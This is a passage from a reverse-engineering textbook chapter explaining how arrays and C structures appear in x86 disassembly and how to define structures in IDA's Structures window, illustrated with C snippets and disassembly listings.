will appear as global variables in the corresponding disassembly. In other
words, the disassembly will offer essentially no evidence that an array exists.
The second point is that the use of variable index values leads us to the start
of the array because the base address will be revealed (as in ➍) when the
computed offset is added to it to compute the actual array location to be
accessed. The computation at ➍ offers one additional piece of significant
information about the array. By observing the amount by which the array
index is multiplied (4 in this case), we learn the size (though not the type)
of an individual element in the array.
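The arithmetic behind both kinds of access can be sketched in C. The helper names below are hypothetical; the base address 0x40B720 and the scale factor 4 are taken from the listing. The first function mirrors the base + index * size computation of the indexed access, and the second shows how a fixed address that falls inside a suspected array maps back to an index.

```c
#include <assert.h>
#include <stdint.h>

/* Address of element idx in an array that starts at base. */
uint32_t element_address(uint32_t base, uint32_t idx, uint32_t elem_size) {
    return base + idx * elem_size;
}

/* Map an address back to an array index; returns -1 if the address lies
 * below the base or does not fall on an element boundary. */
int32_t index_of(uint32_t base, uint32_t addr, uint32_t elem_size) {
    assert(elem_size != 0);
    if (addr < base || (addr - base) % elem_size != 0) {
        return -1;
    }
    return (int32_t)((addr - base) / elem_size);
}
```

Here element_address(0x40B720, 2, 4) gives 0x40B728, the address written by the third constant-index store, and index_of(0x40B720, 0x40B728, 4) maps that address back to index 2.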

Stack-Allocated Arrays

How does array access differ if the array is allocated as a stack variable instead?

Instinctively, we might think that it must be different since the compiler can’t

know an absolute address at compile time, so surely even accesses that use

constant indexes must require some computation at runtime. In practice,

however, compilers treat stack-allocated arrays almost identically to globally

allocated arrays.

Consider the following program that makes use of a small stack-allocated

array:

int main() {

int stack_array[3];

int idx = 2;

stack_array[0] = 10;

stack_array[1] = 20;

stack_array[2] = 30;

stack_array[idx] = 40;

}

The address at which stack_array will be allocated is unknown at compile

time, so it is not possible for the compiler to precompute the address of

stack_array[1] at compile time as it did in the global array example. By exam-

ining the disassembly listing for this function, we gain insight into how stack-

allocated arrays are accessed:

.text:00401000 _main proc near
.text:00401000
.text:00401000 var_10 = dword ptr -10h
.text:00401000 var_C = dword ptr -0Ch
.text:00401000 var_8 = dword ptr -8
.text:00401000 idx = dword ptr -4
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 10h
.text:00401006 mov [ebp+idx], 2
.text:0040100D ➊mov [ebp+var_10], 10
.text:00401014 ➋mov [ebp+var_C], 20
.text:0040101B ➌mov [ebp+var_8], 30
.text:00401022 mov eax, [ebp+idx]
.text:00401025 ➍mov [ebp+eax*4+var_10], 40
.text:0040102D xor eax, eax
.text:0040102F mov esp, ebp
.text:00401031 pop ebp
.text:00401032 retn
.text:00401032 _main endp

As with the global array example, this function appears to have three
variables (var_10, var_C, and var_8) rather than an array of three integers.
Based on the constant operands used at ➊, ➋, and ➌, we know that what
appear to be local variable references are actually references to the three
elements of stack_array whose first element must reside at var_10, the local
variable with the lowest memory address.

To understand how the compiler resolved the references to the other
elements of the array, consider what the compiler goes through when dealing
with the reference to stack_array[1], which lies 4 bytes into the array, or
4 bytes beyond the location of var_10. Within the stack frame, the compiler
has elected to allocate stack_array at ebp - 0x10. The compiler understands
that stack_array[1] lies at ebp - 0x10 + 4, which simplifies to ebp - 0x0C. The
result is that IDA displays this as a local variable reference. The net effect
is that, similar to globally allocated arrays, the use of constant index values
tends to hide the presence of a stack-allocated array. Only the array access at
➍ hints at the fact that var_10 is the first element in the array rather than a
simple integer variable. In addition, the disassembly line at ➍ also helps us
conclude that the size of individual elements in the array is 4 bytes.

Stack-allocated arrays and globally allocated arrays are thus treated very

similarly by compilers. However, there is an extra piece of information that

we can attempt to extract from the disassembly of the stack example. Based

on the location of idx within the stack, it is possible to conclude that the array

that begins with var_10 contains no more than three elements (otherwise, it

would overwrite idx). If you are an exploit developer, this can be very useful

in determining exactly how much data you can fit into an array before you

overflow it and begin to corrupt the data that follows.
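That upper bound is simple arithmetic on the frame offsets that IDA displays. A minimal sketch, assuming a hypothetical helper named max_elements and assuming that no padding lies between the array and the next local variable:

```c
#include <assert.h>

/* Largest element count that fits between the array's frame offset and the
 * frame offset of the next variable above it (offsets relative to ebp). */
int max_elements(int array_offset, int next_var_offset, int elem_size) {
    assert(elem_size > 0 && next_var_offset >= array_offset);
    return (next_var_offset - array_offset) / elem_size;
}
```

For the listing above, max_elements(-0x10, -0x4, 4) evaluates to 3: a fourth 4-byte element would land on idx.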

Heap-Allocated Arrays

Heap-allocated arrays are allocated using a dynamic memory allocation

function such as malloc (C) or new (C++). From the compiler’s perspective,

the primary difference in dealing with a heap-allocated array is that the

compiler must generate all references into the array based on the address

value returned from the memory allocation function. For the sake of com-

parison, we now take a look at the following function, which allocates a

small array in the program heap:

int main() {

int *heap_array = (int*)malloc(3 * sizeof(int));

int idx = 2;

heap_array[0] = 10;

heap_array[1] = 20;

heap_array[2] = 30;

heap_array[idx] = 40;

}

In studying the corresponding disassembly that follows, you should notice

a few similarities and differences with the two previous disassemblies:

.text:00401000 _main proc near
.text:00401000
.text:00401000 heap_array = dword ptr -8
.text:00401000 idx = dword ptr -4
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 8
.text:00401006 ➎push 0Ch ; size_t
.text:00401008 call _malloc
.text:0040100D add esp, 4
.text:00401010 mov [ebp+heap_array], eax
.text:00401013 mov [ebp+idx], 2
.text:0040101A mov eax, [ebp+heap_array]
.text:0040101D ➊mov dword ptr [eax], 10
.text:00401023 mov ecx, [ebp+heap_array]
.text:00401026 ➋mov dword ptr [ecx+4], 20
.text:0040102D mov edx, [ebp+heap_array]
.text:00401030 ➌mov dword ptr [edx+8], 30
.text:00401037 mov eax, [ebp+idx]
.text:0040103A mov ecx, [ebp+heap_array]
.text:0040103D ➍mov dword ptr [ecx+eax*4], 40
.text:00401044 xor eax, eax
.text:00401046 mov esp, ebp
.text:00401048 pop ebp
.text:00401049 retn
.text:00401049 _main endp

The starting address of the array (returned from malloc in the EAX register)
is stored in the local variable heap_array. In this example, unlike the
previous examples, every access to the array begins with reading the contents
of heap_array to obtain the array’s base address before an offset value can be
added to compute the address of the correct element within the array. The
references to heap_array[0], heap_array[1], and heap_array[2] require offsets of
0, 4, and 8 bytes, respectively, as seen at ➊, ➋, and ➌. The operation that most
closely resembles the previous examples is the reference to heap_array[idx] at
➍, in which the offset into the array continues to be computed by multiplying
the array index by the size of an array element.

Heap-allocated arrays have one particularly nice feature. When both the
total size of the array and the size of each element can be determined, it is
easy to compute the number of elements allocated to the array. For
heap-allocated arrays, the parameter passed to the memory allocation function
(0x0C passed to malloc at ➎) represents the total number of bytes allocated
to the array. Dividing this by the size of an element (4 bytes in this example,
as observed from the offsets at ➊, ➋, and ➌) tells us the number of elements
in the array. In the previous example, a three-element array was allocated.
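Both observations can be mirrored in C. In the sketch below, the helper names are hypothetical: store_int_at writes through a base pointer plus a byte offset, which is what the compiled code does with the pointer it reloads from heap_array, and allocated_elements performs the size division described above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Store value at a byte offset from base, as the compiled code does with
 * [eax], [ecx+4], and [edx+8]. memcpy avoids alignment assumptions. */
void store_int_at(void *base, size_t byte_offset, int value) {
    assert(base != NULL);
    memcpy((char *)base + byte_offset, &value, sizeof(value));
}

/* Number of elements implied by an allocation size and an element size. */
size_t allocated_elements(size_t alloc_bytes, size_t elem_size) {
    assert(elem_size != 0);
    return alloc_bytes / elem_size;
}
```

With the values recovered from the listing, allocated_elements(0x0C, 4) returns 3.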

The only firm conclusion we can draw regarding the use of arrays is that

they are easiest to recognize when a variable is used as an index into the

array. The array-access operation requires the index to be scaled by the size

of an array element before adding the resulting offset to the base address of

the array. Unfortunately, as we will show in the next section, when constant

index values are used to access array elements, they do little to suggest the

presence of an array and look remarkably similar to code used to access

structure members.

Structure Member Access

C-style structs, referred to here generically as structures, are heterogeneous

collections of data that allow grouping of items of dissimilar datatypes into a

single composite datatype. A major distinguishing feature of structures is that

the data fields within a structure are accessed by name rather than by index,

as is done with arrays. Unfortunately, field names are converted to numeric

offsets by the compiler, so by the time you are looking at a disassembly, struc-

ture field access looks remarkably similar to accessing array elements using

constant indexes.

When a compiler encounters a structure definition, the compiler main-

tains a running total of the number of bytes consumed by the fields of the

structure in order to determine the offset at which each field resides within

the structure. The following structure definition will be used with the upcom-

ing examples:

struct ch8_struct {   // Size   Minimum offset   Default offset
    int field1;       //  4          0                0
    short field2;     //  2          4                4
    char field3;      //  1          6                6
    int field4;       //  4          7                8
    double field5;    //  8         11               16
};                    // Minimum total size: 19   Default size: 24

The minimum required space to allocate a structure is determined by

the sum of the space required to allocate each field within the structure.

However, you should never assume that a compiler utilizes the minimum

required space to allocate a structure. By default, compilers seek to align

structure fields to memory addresses that allow for the most efficient reading

and writing of those fields. For example, 4-byte integer fields will be aligned

to offsets that are divisible by 4, while 8-byte doubles will be aligned to offsets

that are divisible by 8. Depending on the composition of the structure, meet-

ing alignment requirements may require the insertion of padding bytes,

causing the actual size of a structure to be larger than the sum of its compo-

nent fields. The default offsets and resulting structure size for the example

structure shown previously can be seen in the Default offset column.

Structures can be packed into the minimum required space by using

compiler options to request specific member alignments. Microsoft Visual

C/C++ and GNU gcc/g++ both recognize the pack pragma as a means of

controlling structure field alignment. The GNU compilers additionally rec-

ognize the packed attribute as a means of controlling structure alignment on

a per-structure basis. Requesting 1-byte alignment for structure fields causes

compilers to squeeze the structure into the minimum required space. For

our example structure, this yields the offsets and structure size found in the

Minimum offset column. Note that some CPUs perform better when data is

aligned according to its type, while other CPUs may generate exceptions if

data is not aligned on specific boundaries.
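The two layouts can be compared with offsetof and sizeof. The following sketch declares the example structure twice, once with default alignment and once under the pack pragma; the second structure name and the padding_bytes helper are introduced here purely for illustration. The packed figures assume a 4-byte int, 2-byte short, and 8-byte double. The default figures depend on the compiler and target ABI; for example, 32-bit x86 System V targets typically align double members to 4 bytes, which gives a 20-byte structure rather than the 24 bytes shown in the table.

```c
#include <assert.h>
#include <stddef.h>

struct ch8_struct {          /* default alignment chosen by the compiler */
    int field1;
    short field2;
    char field3;
    int field4;
    double field5;
};

#pragma pack(push, 1)        /* request 1-byte alignment */
struct ch8_struct_packed {
    int field1;
    short field2;
    char field3;
    int field4;
    double field5;
};
#pragma pack(pop)

/* Bytes of padding the compiler added to the default layout. */
size_t padding_bytes(void) {
    assert(sizeof(struct ch8_struct) >= sizeof(struct ch8_struct_packed));
    return sizeof(struct ch8_struct) - sizeof(struct ch8_struct_packed);
}
```

Printing offsetof(struct ch8_struct, field4) next to offsetof(struct ch8_struct_packed, field4) on your own toolchain is a quick way to see which of the two columns a given binary is likely to follow.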

With these facts in mind, we can begin our look at how structures are

treated in compiled code. For the sake of comparison, it is worth observing

that, as with arrays, access to structure members is performed by adding the

base address of the structure to the offset of the desired member. However,

while array offsets can be computed at runtime from a provided index value

(because each item in an array has the same size), structure offsets must be

precomputed and will turn up in compiled code as fixed offsets into the

structure, looking nearly identical to array references that make use of con-

stant indexes.

Globally Allocated Structures

As with globally allocated arrays, the address of globally allocated structures

is known at compile time. This allows the compiler to compute the address of

each member of the structure at compile time and eliminates the need to do

any math at runtime. Consider the following program that accesses a globally

allocated structure:

struct ch8_struct global_struct;

int main() {

global_struct.field1 = 10;

global_struct.field2 = 20;

global_struct.field3 = 30;

global_struct.field4 = 40;

global_struct.field5 = 50.0;

}

If this program is compiled with default structure alignment options, we

can expect to see something like the following when we disassemble it:

.text:00401000 _main proc near

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 mov dword_40EA60, 10

.text:0040100D mov word_40EA64, 20

.text:00401016 mov byte_40EA66, 30

.text:0040101D mov dword_40EA68, 40

.text:00401027 fld ds:dbl_40B128

.text:0040102D fstp dbl_40EA70

.text:00401033 xor eax, eax

.text:00401035 pop ebp

.text:00401036 retn

.text:00401036 _main endp

This disassembly contains no math whatsoever to access the members of

the structure, and, in the absence of source code, it would not be possible to

state with any certainty that a structure is being used at all. Because the com-

piler has performed all of the offset computations at compile time, this pro-

gram appears to reference five global variables rather than five fields within a

single structure. You should be able to note the similarities with the previous

example regarding globally allocated arrays using constant index values.

Stack-Allocated Structures

Like stack-allocated arrays (see “Stack-Allocated Arrays”), stack-allocated structures are

difficult to recognize based on stack layout alone. Modifying the preceding

program to use a stack-allocated structure, declared in main, yields the

following disassembly:

.text:00401000 _main proc near

.text:00401000

.text:00401000 var_18 = dword ptr -18h

.text:00401000 var_14 = word ptr -14h

.text:00401000 var_12 = byte ptr -12h

.text:00401000 var_10 = dword ptr -10h

.text:00401000 var_8 = qword ptr -8

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 18h

.text:00401006 mov [ebp+var_18], 10

.text:0040100D mov [ebp+var_14], 20

.text:00401013 mov [ebp+var_12], 30

.text:00401017 mov [ebp+var_10], 40

.text:0040101E fld ds:dbl_40B128

.text:00401024 fstp [ebp+var_8]

.text:00401027 xor eax, eax

.text:00401029 mov esp, ebp

.text:0040102B pop ebp

.text:0040102C retn

.text:0040102C _main endp

Again, no math is performed to access the structure’s fields since the

compiler can determine the relative offsets for each field within the stack

frame at compile time. In this case, we are left with the same, potentially mis-

leading picture that five individual variables are being used rather than a single

variable that happens to contain five distinct fields. In reality, var_18 should be

the start of a 24-byte structure, and each of the other variables should some-

how be formatted to reflect the fact that they are fields within the structure.
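One way to test the hypothesis that a group of local variables is really a single structure is to add each field's offset to the frame offset of the first variable and compare the results against the names IDA assigned. A minimal sketch with a hypothetical helper, using the default offsets listed for ch8_struct (0, 4, 6, 8, and 16):

```c
#include <assert.h>

/* Frame offset (relative to ebp) of a field, given the frame offset of the
 * start of the structure and the field's offset within the structure. */
int field_frame_offset(int struct_frame_offset, int field_offset) {
    assert(field_offset >= 0);
    return struct_frame_offset + field_offset;
}
```

Starting from -0x18, the five field offsets produce -0x18, -0x14, -0x12, -0x10, and -0x8, which line up exactly with var_18, var_14, var_12, var_10, and var_8.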

Heap-Allocated Structures

Heap-allocated structures turn out to be much more revealing regarding the

size of the structure and the layout of its fields. When a structure is allocated

in the program heap, the compiler has no choice but to generate code to

compute the proper offset into the structure whenever a field is accessed.

This is a result of the structure’s address being unknown at compile time. For

globally allocated structures, the compiler is able to compute a fixed starting

address. For stack-allocated structures, the compiler can compute a fixed

relationship between the start of the structure and the frame pointer for the


enclosing stack frame. When a structure has been allocated in the heap, the

only reference to the structure available to the compiler is the pointer to the

structure’s starting address.

Modifying our structure example once again to make use of a heap-

allocated structure results in the following disassembly. Similar to the

heap-allocated array example from page 134, we declare a pointer within

main and assign it the address of a block of memory large enough to hold

our structure:

.text:00401000 _main proc near

.text:00401000

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 push ecx

.text:00401004 ➏ push 24 ; size_t

.text:00401006 call _malloc

.text:0040100B add esp, 4

.text:0040100E mov [ebp+heap_struct], eax

.text:00401011 mov eax, [ebp+heap_struct]

.text:00401014 ➊ mov dword ptr [eax], 10

.text:0040101A mov ecx, [ebp+heap_struct]

.text:0040101D ➋ mov word ptr [ecx+4], 20

.text:00401023 mov edx, [ebp+heap_struct]

.text:00401026 ➌ mov byte ptr [edx+6], 30

.text:0040102A mov eax, [ebp+heap_struct]

.text:0040102D ➍ mov dword ptr [eax+8], 40

.text:00401034 mov ecx, [ebp+heap_struct]

.text:00401037 fld ds:dbl_40B128

.text:0040103D ➎ fstp qword ptr [ecx+10h]

.text:00401040 xor eax, eax

.text:00401042 mov esp, ebp

.text:00401044 pop ebp

.text:00401045 retn

.text:00401045 _main endp

In this example, unlike the global and stack-allocated structure exam-

ples, we are able to discern the exact size and layout of the structure. The

structure size can be inferred to be 24 bytes based on the amount of memory

requested from malloc ➏. The structure contains the following fields at the

indicated offsets:

• A 4-byte (dword) field at offset 0 ➊

• A 2-byte (word) field at offset 4 ➋

• A 1-byte field at offset 6 ➌

• A 4-byte (dword) field at offset 8 ➍

• An 8-byte (qword) field at offset 16 (10h) ➎
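The field list above can be written back into C as a quick sanity check. This is a minimal sketch under stated assumptions: the type name ch8_struct_view, the helper fill_by_offset, and the padding member names are hypothetical, the field types are guesses that merely match the observed sizes, and the value 50.0 is assumed because the listing shows only the symbol dbl_40B128. Padding is spelled out as explicit members so that the offsets do not depend on any particular compiler's alignment rules.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Layout reconstructed from the offsets seen in the listing. */
struct ch8_struct_view {
    int32_t field1;      /* offset 0,  4 bytes */
    int16_t field2;      /* offset 4,  2 bytes */
    int8_t  field3;      /* offset 6,  1 byte  */
    uint8_t pad_7;       /* offset 7,  padding */
    int32_t field4;      /* offset 8,  4 bytes */
    uint8_t pad_c[4];    /* offset 12, padding */
    double  field5;      /* offset 16, 8 bytes */
};

/* Store values using only "base pointer + constant offset", which is all
 * the compiler has to work with when the structure lives in the heap. */
static void fill_by_offset(void *base)
{
    unsigned char *p = base;
    int32_t f1 = 10, f4 = 40;
    int16_t f2 = 20;
    int8_t  f3 = 30;
    double  f5 = 50.0;   /* assumed value, not visible in the listing */

    assert(base != NULL);
    memcpy(p + 0,  &f1, sizeof f1);   /* mov dword ptr [eax], 10   */
    memcpy(p + 4,  &f2, sizeof f2);   /* mov word ptr [ecx+4], 20  */
    memcpy(p + 6,  &f3, sizeof f3);   /* mov byte ptr [edx+6], 30  */
    memcpy(p + 8,  &f4, sizeof f4);   /* mov dword ptr [eax+8], 40 */
    memcpy(p + 16, &f5, sizeof f5);   /* fstp qword ptr [ecx+10h]  */
}
```

If the reconstruction is right, reading the block back through the structure type returns the same values that were written through raw offsets, and sizeof reports the 24 bytes requested from malloc.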


Based on the use of floating point instructions, we can further deduce

that the qword field is actually a double. The same program compiled to pack

structures with a 1-byte alignment yields the following disassembly:

.text:00401000 _main proc near

.text:00401000

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 push ecx

.text:00401004 push 19 ; size_t

.text:00401006 call _malloc

.text:0040100B add esp, 4

.text:0040100E mov [ebp+heap_struct], eax

.text:00401011 mov eax, [ebp+heap_struct]

.text:00401014 mov dword ptr [eax], 10

.text:0040101A mov ecx, [ebp+heap_struct]

.text:0040101D mov word ptr [ecx+4], 20

.text:00401023 mov edx, [ebp+heap_struct]

.text:00401026 mov byte ptr [edx+6], 30

.text:0040102A mov eax, [ebp+heap_struct]

.text:0040102D mov dword ptr [eax+7], 40

.text:00401034 mov ecx, [ebp+heap_struct]

.text:00401037 fld ds:dbl_40B128

.text:0040103D fstp qword ptr [ecx+0Bh]

.text:00401040 xor eax, eax

.text:00401042 mov esp, ebp

.text:00401044 pop ebp

.text:00401045 retn

.text:00401045 _main endp

The only changes to the program are the smaller size of the structure

(now 19 bytes) and the adjusted offsets to account for the realignment of

each structure field.
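The packed layout can be reproduced with a pack pragma, which GCC, Clang, and Microsoft compilers all accept. The sketch below is an assumption-laden reconstruction rather than the original source: the name ch8_struct_packed and the helper verify_packed_layout are hypothetical, and the fixed-width types were chosen only to match the field sizes seen in the listing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#pragma pack(push, 1)            /* 1-byte member alignment: no padding */
struct ch8_struct_packed {
    int32_t field1;              /* offset 0        */
    int16_t field2;              /* offset 4        */
    int8_t  field3;              /* offset 6        */
    int32_t field4;              /* offset 7        */
    double  field5;              /* offset 11 (0Bh) */
};
#pragma pack(pop)

/* Aborts if the compiler's layout differs from the packed listing. */
static void verify_packed_layout(void)
{
    assert(offsetof(struct ch8_struct_packed, field1) == 0);
    assert(offsetof(struct ch8_struct_packed, field2) == 4);
    assert(offsetof(struct ch8_struct_packed, field3) == 6);
    assert(offsetof(struct ch8_struct_packed, field4) == 7);
    assert(offsetof(struct ch8_struct_packed, field5) == 11);
    assert(sizeof(struct ch8_struct_packed) == 19);
}
```

The offsets 7 and 0Bh and the total of 19 bytes match the operands of the packed listing, which is a useful cross-check before committing to a layout in IDA.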

Regardless of the alignment used when compiling a program, finding

structures allocated and manipulated in the program heap is the fastest way

to determine the size and layout of a given data structure. However, keep in

mind that many functions will not do you the favor of immediately accessing

every member of a structure to help you understand the structure’s layout.

Instead, you may need to follow the use of the pointer to the structure and

make note of the offsets used whenever that pointer is dereferenced. In this

manner, you will eventually be able to piece together the complete layout of

the structure.
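The bookkeeping described here can be sketched in a few lines of C. Everything in this example is hypothetical scaffolding (the names layout_notes, note_access, and min_struct_size are invented for illustration); it simply records each (offset, size) pair observed when the structure pointer is dereferenced and reports the smallest structure size consistent with those observations.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_ACCESSES 32

struct access { size_t offset; size_t size; };

struct layout_notes {
    struct access seen[MAX_ACCESSES];
    size_t count;
};

/* Record one dereference, e.g. "mov word ptr [ecx+4], 20" becomes (4, 2).
 * Repeated observations are ignored. Returns 0 on success, -1 if full. */
static int note_access(struct layout_notes *n, size_t offset, size_t size)
{
    assert(n != NULL && size > 0);
    for (size_t i = 0; i < n->count; i++)
        if (n->seen[i].offset == offset && n->seen[i].size == size)
            return 0;
    if (n->count == MAX_ACCESSES)
        return -1;
    n->seen[n->count].offset = offset;
    n->seen[n->count].size = size;
    n->count++;
    return 0;
}

/* Lower bound on the structure size implied by the accesses seen so far. */
static size_t min_struct_size(const struct layout_notes *n)
{
    size_t end = 0;
    for (size_t i = 0; i < n->count; i++) {
        size_t e = n->seen[i].offset + n->seen[i].size;
        if (e > end)
            end = e;
    }
    return end;
}
```

Note that min_struct_size is only a lower bound. Trailing fields that are never touched remain invisible, which is why an allocation size, when one is available, is the stronger evidence.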

Arrays of Structures

Some programmers would say that the beauty of composite data structures is

that they allow you to build arbitrarily complex structures by nesting smaller

structures within larger structures. Among other possibilities, this capability

allows for arrays of structures, structures within structures, and structures


that contain arrays as members. The preceding discussions regarding arrays

and structures apply just as well when dealing with nested types such as these.

As an example, consider an array of structures like the following simple pro-

gram in which heap_struct points to an array of five ch8_struct items:

#include <stdlib.h>   /* malloc */

/* struct ch8_struct is the structure used throughout this chapter */

int main() {

    int idx = 1;

    struct ch8_struct *heap_struct;

    heap_struct = (struct ch8_struct*)malloc(sizeof(struct ch8_struct) * 5);

    heap_struct[idx].field1 = 10;   /* ➊ */

}

The operations required to access field1 at ➊ include multiplying the

index value by the size of an array element, in this case the size of the struc-

ture, and then adding the offset to the desired field. The corresponding dis-

assembly is shown here:

.text:00401000 _main proc near

.text:00401000

.text:00401000 idx = dword ptr -8

.text:00401000 heap_struct = dword ptr -4

.text:00401000

.text:00401000 push ebp

.text:00401001 mov ebp, esp

.text:00401003 sub esp, 8

.text:00401006 mov [ebp+idx], 1

.text:0040100D ➋ push 120 ; size_t

.text:0040100F call _malloc

.text:00401014 add esp, 4

.text:00401017 mov [ebp+heap_struct], eax

.text:0040101A mov eax, [ebp+idx]

.text:0040101D ➌ imul eax, 24

.text:00401020 mov ecx, [ebp+heap_struct]

.text:00401023 ➍ mov dword ptr [ecx+eax], 10

.text:0040102A xor eax, eax

.text:0040102C mov esp, ebp

.text:0040102E pop ebp

.text:0040102F retn

.text:0040102F _main endp

The disassembly reveals 120 bytes (➋) being requested from the heap.

The array index is multiplied by 24 at ➌ before being added to the start

address for the array at ➍. No additional offset is required in order to gener-

ate the final address for the reference at ➍. From these facts we can deduce

the size of an array item (24), the number of items in the array (120 / 24 = 5),

and the fact that there is a 4-byte (dword) field at offset 0 within each array ele-

ment. This short listing does not offer enough information to draw any con-

clusions about how the remaining 20 bytes within each structure are

allocated to additional fields.
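The address arithmetic behind these deductions can be made explicit. The helpers below are a hypothetical sketch (the names element_field_address and element_count are not taken from any library); they restate the computation base + index * element size + field offset, along with the division used to recover the element count.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Address of a field inside element `index` of an array of structures. */
static uintptr_t element_field_address(uintptr_t base, size_t index,
                                       size_t elem_size, size_t field_offset)
{
    assert(field_offset < elem_size);   /* field must lie inside one element */
    return base + index * elem_size + field_offset;
}

/* Number of whole elements that fit in an allocation. */
static size_t element_count(size_t alloc_size, size_t elem_size)
{
    assert(elem_size != 0);
    return alloc_size / elem_size;
}
```

With the values from the listing, element_count(120, 24) gives 5, and the store to field1 of element 1 lands 24 bytes past the start of the array because the field offset is 0. A field at offset 16 of the same element would land 40 bytes past the start.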


Creating IDA Structures

In the last chapter we saw how IDA’s array-aggregation capabilities allow dis-

assembly listings to be simplified by collapsing long lists of data declarations

into a single disassembly line. In the next few sections we take a look at IDA’s

facilities for improving the readability of code that manipulates structures.

Our goal is to move away from structure references such as [edx + 10h] and

toward something more readable like [edx + ch8_struct.field5].

Whenever you discover that a program is manipulating a data structure,

you need to decide whether you want to incorporate structure field names

into your disassembly or whether you can make sense of all the numeric off-

sets sprinkled throughout the listing. In some cases, IDA may recognize the

use of a structure defined as part of the C standard library or the Windows

API. In such cases, IDA may have knowledge of the exact layout of the struc-

ture and be able to convert numeric offsets into more symbolic field names.

This is the ideal case, as it leaves you with a lot less work to do. We will return

to this scenario once we understand a little more about how IDA deals with

structure definitions in general.

Creating a New Structure (or Union)

When a program appears to be using a structure for which IDA has no layout

knowledge, IDA offers facilities for specifying the composition of the struc-

ture and having the newly defined structure incorporated into the disassem-

bly. Structure creation in IDA takes place within the Structures window (see

Figure 8-2). No structure can be incorporated into a disassembly until it is

first listed in the Structures window. Any structure that is known to IDA and

that is recognized to be used by a program will automatically be listed in the

Structures window.

Figure 8-2: The Structures window

There are two reasons why the use of a structure may go unrecognized

during the analysis phase. First, even though IDA may have knowledge of a

particular structure’s layout, there may be insufficient information for IDA to

conclude that the program utilizes the structure. Second, the structure may

be a nonstandard structure that IDA knows nothing about. In both cases the

problem can be overcome, and in both cases the solution begins with the

Structures window.


The first four lines of text in the Structures window serve as a constant

reminder of the operations that are possible within the window. The princi-

pal operations we are concerned with involve adding, removing, and editing

structures. Adding a structure is initiated using the INSERT key, which opens

the Create Structure/Union dialog shown in Figure 8-3.

Figure 8-3: The Create Structure/Union dialog

In order to create a new structure, you must first specify the name in the

Structure name field. The first two checkboxes determine where or whether

the new structure will be displayed within the Structures window. The third

checkbox, Create union, specifies whether you are defining a structure or a

C-style union.³ For structures, the size is computed as the sum of the sizes of

each component field, while for unions, the size is computed as the size of the

largest component field. The Add standard structure button is used to access

the list of all structure datatypes that IDA is currently aware of. The behavior of

this button is discussed in “Using Standard Structures” on page 151. Once you

specify a structure name and click OK, an empty structure definition will be

created in the Structures window, as shown in Figure 8-4.

Figure 8-4: An empty structure definition

This structure definition must be edited to complete the definition of

the structure layout.

3. A union is similar to a struct in that it may consist of many named fields, each of differing type.

The difference between the two lies in the fact that fields within a union directly overlap one

another so that the size of a union is equal to the size of the largest field.
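The two sizing rules can be restated as code. This sketch models only the rule as described in the text (sum of member sizes for a structure, largest member for a union); the function names are hypothetical and nothing here calls into IDA.

```c
#include <assert.h>
#include <stddef.h>

/* Structure size as described above: the sum of the member sizes.
 * Padding counts only if it has been added as a member. */
static size_t ida_struct_size(const size_t *member_sizes, size_t count)
{
    size_t total = 0;
    assert(member_sizes != NULL || count == 0);
    for (size_t i = 0; i < count; i++)
        total += member_sizes[i];
    return total;
}

/* Union size as described above: the size of the largest member. */
static size_t ida_union_size(const size_t *member_sizes, size_t count)
{
    size_t largest = 0;
    assert(member_sizes != NULL || count == 0);
    for (size_t i = 0; i < count; i++)
        if (member_sizes[i] > largest)
            largest = member_sizes[i];
    return largest;
}
```

For member sizes 4, 2, 1, 4, and 8, the structure rule gives 19 bytes and the union rule gives 8. Adding a 1-byte and a 4-byte padding member brings the structure total to 24.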


Editing Structure Members

In order to add fields to your new structure, you must make use of the field-

creation commands D, A, and the asterisk key (*) on the numeric keypad.

Initially, only the D command is useful, and unfortunately, its behavior is

highly dependent on the location of the cursor. For that reason, the follow-

ing steps are recommended for adding fields to a structure.

1. To add a new field to a structure, position the cursor on the last line

of the structure definition (the one containing ends) and press D. This

causes a new field to be added to the end of the structure. The size of

the new field will be set according to the first size selected on the data

carousel (Chapter 7). The name of the field will initially be field_N,

where N is the numeric offset from the start of the structure to the start

of the new field (field_0, for example).

2. Should you need to modify the size of the field, you may do so by first

ensuring that the cursor is positioned on the new field name and then

selecting the correct data size for the field by repeatedly pressing D in

order to cycle through the datatypes on the data carousel. Alternatively,

you may use OptionsSetup Data Types to specify a size that is not avail-

able on the data carousel. If the field is an array, right-click the name and

select Array to open the array specification dialog (Chapter 7).

3. To change the name of a structure field, click the field name and use the

N hotkey, or right-click the name and select Rename; then provide a new

name for the field.

The following helpful hints may be of use as you define your own

structures.

• The byte offset to a field is displayed as an eight-digit hex value on the

left side of the Structures window.

• Every time you add or delete a structure field or change the size of an

existing field, the new size of the structure will be reflected on the first

line of the structure definition.

• You can add comments to a structure field just as you can add comments

to any disassembly line. Right-click (or use a hotkey) on the field you

wish to add a comment to and select one of the available comment

options.

• Contrary to the instructions at the top of the Structures window, the U

key will delete a structure field only if it is the last field in the structure.

For all other fields, pressing U merely undefines the field, which removes

the name but does not remove the bytes allocated to the field.

• You are responsible for proper alignment of all fields within a structure

definition. IDA makes no distinction between packed and unpacked

structures. If you require padding bytes to properly align fields, then you are

responsible for adding them. Padding bytes are best added as dummy

fields of the proper size, which you may or may not choose to undefine

once you have added additional fields.

• Bytes allocated in the middle of a structure can be removed only by first

undefining the associated field and then selecting Edit ▶ Shrink Struct

Type to remove the undefined bytes.

• Bytes may be inserted into the middle of a structure by selecting the field

that will follow the new bytes and then using Edit ▶ Expand Struct Type

to insert a specified number of bytes before the selected field.

• If you know the size of a structure but not the layout, you need to create

two fields. The first field should be an array of (size - 1) bytes. The second

field should be a 1-byte field. After you have created the second field,

undefine the first (array) field. The size of the structure will be pre-

served, and you can easily come back later to define fields and their sizes

as you learn more about the layout of the structure.
